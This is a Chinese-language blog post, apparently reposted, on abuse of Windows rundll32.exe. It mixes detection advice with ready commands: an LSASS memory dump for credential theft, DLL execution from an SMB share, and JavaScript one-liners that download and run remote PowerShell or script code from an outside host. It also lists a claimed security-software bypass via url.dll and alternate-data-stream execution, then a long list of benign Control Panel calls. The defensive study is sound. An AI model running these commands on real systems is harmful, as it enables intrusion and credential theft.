深挖 Rundll32.exe 的多种“滥用方式”以及其“独特”之处
惡意軟件作者通常會編寫惡意軟件模仿合法的Windows進程。因此,我們可能會看到惡意軟件偽裝成svchost.exe、rundll32.exe或lsass.exe進程,攻擊者利用的就是大多數Windows用戶可能都不清楚這些系統進程在正常情況下的行為特征。在這篇文章中,我們將深挖rundll32.exe,以期對其有所了解。
- 關于 Rundll.exe
顧名思義,rundll32.exe可執行文件是用于運行DLL(RUN DLL),即運行動態鏈接庫的。
在MSDN中,對DLL的定義如下:
動態鏈接庫(DLL)是一個模塊,其中包含可以由另一個模塊(應用程序或DLL)使用的函數和數據。
以下是使用rundll32.exe的最基本語法:
- rundll32
rundll32.exe可執行文件可以是子進程,也可以是父進程,具體要取決于執行的上下文。為了確定一個rundll32.exe實例是否屬于惡意,我們需要確認幾件事。首先,需要確認啟動它的路徑,其次是命令行。
合法的RUNDLL32.EXE進程始終位于:
\Windows\System32\rundll32.exe
\Windows\SysWOW64\rundll32.exe(64位系統上的32位版本)
至于rundll32.exe實例的命令行,完全取決于要運行的內容,例如CPL文件、DLL安裝等等。
下面我們將詳細介紹一系列 rundll32.exe 調用和對應的作用。
案例:
- SHELL32.DLL – “OpenAs_RunDLL”
Rundll32.exe還可以執行DLL中的特定函數。例如,當選擇一個文件并右鍵單擊時,將會顯示出一個上下文菜單,其中包含多個選項。這里的一個選項是“OpenWith”(打開方式)。在點擊后,將會出現一個彈出窗口,可以從系統上安裝的應用程序中進行選擇。
在此過程的背后,是使用 shell32.dll 和 OpenAs_RunDL 函數啟動 rundll32.exe 實用程序,實際上就相當于在后臺執行了以下命令:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL < file_path >
拿修改 hosts 文件舉個例子,通過 WIN+R 執行以下命令,即可彈出該選擇窗口:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
這種在DLL中調用特定函數的行為非常普遍,因此我們恐怕無法將所有函數都了解全面。
- SHELL32.DLL – “Control_RunDLL”
我們發現與shell32.dll一起使用的另一個常見函數是Control_RunDLL或Control_RunDLLAsUser。這兩個函數用于運行.CPL文件或控制面板選項。
例如,如果我們要更改計算機的日期和時間,可以從控制面板啟動對應的applet。
在后臺,Windows實際上是使用以下命令行啟動了rundll32.exe實例。
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl
打開防火墻:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl
很顯然,這里的 CPL 文件也可以被替換成惡意文件,所以一旦出現可疑的路徑及文件名,我們就需要結合其它工具來檢查它的合法性。
除了檢查.CPL文件外,在使用 Control_RunDLL 或 Control_RunDLLAsUser 函數時,應該一并檢查所指向的.DLL文件合法性。
- DLL文件的調用
攻擊者如果使用合法的 DLL 文件來完成攻擊活動,按照傳統的檢測手段,確實會大大增加防守難度,例如利用 comsvcs.dll 中的 MiniDump 函數對目標進程進行內存轉儲,從而實現憑證竊取,參考這里:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
類似的還有 advpack.dll,原本是用于幫助硬件和軟件讀取和驗證.INF文件,也會被攻擊者用做代碼執行,參考這里:
c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\360\360.png,DefaultInstall
當然,這些攻擊手法在實際使用過程中肯定會有許多變種,用于繞過一些常規的檢測方式,比如 MiniDump 函數的調用也可以通過編號 #24 完成,感興趣的朋友可以看看這里:
- 從 SMB 共享執行 DLL
rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
使用 Rundll32.exe 從 SMB 共享執行 DLL。EntryPoint 是 .DLL 文件中要執行的入口點的名稱。
用例:從 SMB 共享執行 DLL。
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行 JavaScript 腳本
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://www.chwm.vip/?javascript');")
使用 Rundll32.exe 執行 JavaScript 腳本,該腳本運行從以下位置下載的 PowerShell 腳本一個遠程網站。
用例:從 Internet 執行代碼
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行運行外部程序
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
使用 Rundll32.exe 執行運行 calc 的 JavaScript 腳本。EXE文件。
用例:代理執行
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行運行外部程序并殺死 rundll32.exe 進程
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
使用 Rundll32.exe 執行運行 calc.exe 的 JavaScript 腳本并殺死啟動的 Rundll32.exe 進程。
用例:代理執行
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行調用遠程 JavaScript 腳本
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.chwm.vip/test/test.js")
使用 Rundll32.exe 執行調用遠程 JavaScript 的 JavaScript 腳本。
用例:從 Internet 執行代碼
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行 VBScript 腳本代碼
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.execScript("msgbox('a')","vbs");window.close()
使用 Rundll32.exe 執行調用 VBScript 腳本。
用例:代理執行
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 加載已注冊或劫持的 COM 服務器
rundll32.exe –localserver < CLSID_GUID >
rundll32.exe –sta < CLSID_GUID >
使用 Rundll32.exe 加載已注冊或劫持的 COM 服務器有效負載。也適用于 ProgID。
二者均可以用于加載惡意注冊的COM對象。
需要驗證相應的注冊表項\HKEY_CLASSES_ROOT\CLSID\
推薦大家閱讀以下文章,以詳細了解這種技術。
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
- 執行命令繞過安全軟件
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
這是經過反匯編分析 Url.dll 得出的結果,可以成功繞開大部分安全軟件。
用例:代理執行
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 備用數據流
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
使用 Rundll32.exe 執行存儲在備用數據流 (ADS) 中的 .DLL 文件。
用例:從備用數據流執行代碼
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 執行 HTML 代碼
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication < HTML Code >
使用 Rundll32.exe 調用 mshtml.dll 運行 HTML 代碼。
用例:代理執行
所需權限: 用戶
操作系統:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
其他使用方法
"rundll32 shell32,Control_RunDLL" - 運行控制面板
"rundll32 shell32,OpenAs_RunDLL" - 打開"打開方式"窗口
"rundll32 shell32,ShellAboutA Info-Box" - 打開"關于"窗口
"rundll32 shell32,Control_RunDLL desk.cpl" - 打開"顯示屬性"窗口
"rundll32 user,cascadechildwindows" - 層疊全部窗口
"rundll32 user,tilechildwindows" - 最小化所有的子窗口
"rundll32 user,repaintscreen" - 刷新桌面
"rundll32 shell,shellexecute Explorer" - 重新運行Windows Explorer
"rundll32 keyboard,disable" - 鎖寫鍵盤
"rundll32 mouse,disable" - 讓鼠標失效
"rundll32 user,swapmousebutton" - 交換鼠標按鈕
"rundll32 user,setcursorpos" - 設置鼠標位置為(0,0)
"rundll32 user,wnetconnectdialog" - 打開"映射網絡驅動器"窗口
"rundll32 user,wnetdisconnectdialog" - 打開"斷開網絡驅動器"窗口
"rundll32 user,disableoemlayer" - 顯示BSOD窗口, (BSOD) = Blue Screen Of Death, 即藍屏
"rundll32 diskcopy,DiskCopyRunDll" - 打開磁盤復制窗口
"rundll32 rnaui.dll,RnaWizard" - 運行"Internet連接向導", 如果加上參數"/1"則為silent模式
"rundll32 shell32,SHFormatDrive" - 打開"格式化磁盤(A)"窗口
"rundll32 shell32,SHExitWindowsEx -1" - 冷啟動Windows Explorer
"rundll32 shell32,SHExitWindowsEx 1" - 關機
"rundll32 shell32,SHExitWindowsEx 0" - 退當前用戶
"rundll32 shell32,SHExitWindowsEx 2" Windows9x 快速重啟
"rundll32 krnl386.exe,exitkernel" - 強行退出Windows 9x(無確認)
"rundll rnaui.dll,RnaDial "MyConnect" - 運行"網絡連接"對話框
"rundll32 msprint2.dll,RUNDLL_PrintTestPage" - 選擇打印機和打印測試頁
"rundll32 user,setcaretblinktime" - 設置光標閃爍速度
"rundll32 user, setdoubleclicktime" - 測試鼠標雙擊速度
"rundll32 sysdm.cpl,InstallDevice_Rundll" - 搜索非PnP設備
"rundll32.exe user.exe,restartwindows" - 重啟電腦
控制面板中的各項功能
winexec('rundll32.exe shell32.dll, Control_RunDLL', 9);
{輔助選項 屬性-鍵盤}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 1', 9);
{輔助選項 屬性-聲音}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 2', 9);
{輔助選項 屬性-顯示}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 3', 9);
{輔助選項 屬性-鼠標}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 4', 9);
{輔助選項 屬性-常規}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 5', 9);
{添加/刪除程序 屬性-安裝/卸載}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 1', 9);
{添加/刪除程序 屬性-Windows安裝程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 2', 9);
{添加/刪除程序 屬性-啟動盤}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 3', 9);
{顯示 屬性-背景}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 0', 9);
{顯示 屬性-屏幕保護程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 1', 9);
{顯示 屬性-外觀}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 2', 9);
{顯示 屬性-設置}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 3', 9);
{Internet 屬性-常規}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 0', 9);
{Internet 屬性-安全}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 1', 9);
{Internet 屬性-內容}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 2', 9);
{Internet 屬性-連接}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 3', 9);
{Internet 屬性-程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 4', 9);
{Internet 屬性-高級}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 5', 9);
{區域設置 屬性-區域設置}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 0', 9);
{區域設置 屬性-數字}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 1', 9);
{區域設置 屬性-貨幣}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 2', 9);
{區域設置 屬性-時間}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 3', 9);
{區域設置 屬性-日期}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 4', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 0', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 1', 9);
{鼠標 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Main.cpl', 9);
{多媒體 屬性-音頻}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 0', 9);
{多媒體 屬性-視頻}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 1', 9);
{多媒體 屬性-MIDI}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 2', 9);
{多媒體 屬性-CD音樂}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 3', 9);
{多媒體 屬性-設備}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 4', 9);
{調制解調器 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Modem.cpl', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Netcpl.cpl', 9);
{密碼 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Password.cpl', 9);
{掃描儀與數字相機 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sticpl.cpl', 9);
{系統 屬性-常規}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 0', 9);
{系統 屬性-設備管理器}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 1', 9);
{系統 屬性-硬件配置文件}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 2', 9);
{系統 屬性-性能}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 3', 9);
{日期/時間 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL timedate.cpl', 9);
{電源管理 屬性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Powercfg.cpl', 9);
命令列: rundll32.exe shell32.dll,Control_RunDLL
功能: 顯示控制面板
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
功能: 顯示“控制面板-輔助選項-鍵盤”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
功能: 顯示“控制面板-輔助選項-聲音”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
功能: 顯示“控制面板-輔助選項-顯示”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
功能: 顯示“控制面板-輔助選項-滑鼠”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
功能: 顯示“控制面板-輔助選項-傳統”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
功能: 執行“控制面板-添加新硬體”向導。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
功能: 執行“控制面板-添加新印表機”向導。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
功能: 顯示 “控制面板-添加/刪除程式-安裝/卸載” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
功能: 顯示 “控制面板-添加/刪除程式-安裝Windows” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
功能: 顯示 “控制面板-添加/刪除程式-啟動盤” 面板。
命令列: rundll32.exe syncui.dll,Briefcase_Create
功能: 在桌面上建立一個新的“我的公文包”。
命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
功能: 顯示復制軟碟視窗
命令列: rundll32.exe apwiz.cpl,NewLinkHere %1
功能: 顯示“建立快捷方式”的對話框,所建立的快捷方式的位置由%1參數決定。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
功能: 顯示“日期與時間”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
功能: 顯示“時區”選項視窗。
命令列: rundll32.exe rnaui.dll,RnaDial [某個撥號連接的名稱]
功能: 顯示某個撥號連接的撥號視窗。如果已經撥號連接,則顯示目前的連接狀態的視窗。
命令列: rundll32.exe rnaui.dll,RnaWizard
功能: 顯示“新建撥號連接”向導的視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
功能: 顯示“顯示屬性-背景”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
功能: 顯示“顯示屬性-螢屏保護”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
功能: 顯示“顯示屬性-外觀”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
功能: 顯示顯示“顯示屬性-屬性”選項視窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
功能: 顯示Windows的“字體”檔案夾。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 同樣是顯示Windows的“字體”檔案夾。
命令列: rundll32.exe shell32.dll,SHformatDrive
功能: 顯示格式化軟碟對話框。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
功能: 顯示“控制面板-游戲控制器-一般”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
功能: 顯示“控制面板-游戲控制器-進階”選項視窗。
命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文檔)
功能: 列印HTML文檔。
命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
功能: 顯示Microsoft Exchange一般選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
功能: 顯示“控制面板-滑鼠” 選項 。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
功能: 顯示 “控制面板-鍵盤屬性-速度”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
功能: 顯示 “控制面板-鍵盤屬性-語言”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
功能: 顯示Windows“印表機”檔案夾。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 顯示Windows“字體”檔案夾。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
功能: 顯示“控制面板-輸入法屬性-輸入法”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
功能: 執行“添加新調制解調器”向導。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
功能: 顯示“控制面板-多媒體屬性-音頻”屬性頁。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
功能: 顯示“控制面板-多媒體屬性-視頻”屬性頁。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
功能: 顯示“控制面板-多媒體屬性-MIDI”屬性頁。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
功能: 顯示“控制面板-多媒體屬性-CD音樂”屬性頁。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
功能: 顯示“控制面板-多媒體屬性-設備”屬性頁。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
功能: 顯示“控制面板-聲音”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
功能: 顯示“控制面板-網路”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
功能: 顯示ODBC32資料管理選項視窗。
命令列: rundll32.exe shell32.dll,OpenAs_RunDLL
功能: 顯示指定檔案(drive:pathfilename)的“打開方式”對話框。
命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
功能: 顯示“控制面板-密碼”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
功能: 顯示“控制面板-電源管理屬性”選項視窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder
功能: 顯示Windows“印表機”檔案夾。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl
@2)
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
功能: 顯示“控制面板-區域設置屬性-區域設置”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
功能: 顯示“控制面板-區域設置屬性-數字”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
功能: 顯示“控制面板-區域設置屬性-貨幣”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
功能: 顯示“控制面板-區域設置屬性-時間”選項視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
功能: 顯示“控制面板-區域設置屬性-日期”選項視窗。
命令列: rundll32.exe desk.cpl,InstallScreenSaver [螢屏保護檔案名]
功能: 將指定的螢屏保護檔案設置為Windows的屏保,并顯示螢屏保護屬性視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
功能: 顯示“控制面板-系統屬性-傳統”屬性視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
功能: 顯示“控制面板-系統屬性-設備管理器”屬性視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
功能: 顯示“控制面板-系統屬性-硬體配置檔案”屬性視窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
功能: 顯示“控制面板-系統屬性-性能”屬性視窗。
命令列: rundll32.exe user.exe,restartwindows
功能: 強行關閉所有程式并重啟機器。
命令列: rundll32.exe user.exe,exitwindows
功能: 強行關閉所有程式并關機。
命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
功能: 顯示“撥號屬性”選項視窗
命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
功能: 顯示“桌面主旨”選項面板
總結
感謝大家的閱讀,希望能通過本篇文章對 Rundll32.exe 有所了解。
Rundll32.exe 還有更多利用的方法,本文將持續更新。。。
總結
以上是生活随笔為你收集整理的深挖 Rundll32.exe 的多种“滥用方式”以及其“独特”之处的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: “选择性粘贴为无格式文本”(Paste
- 下一篇: Python小实践 计算生肖与星座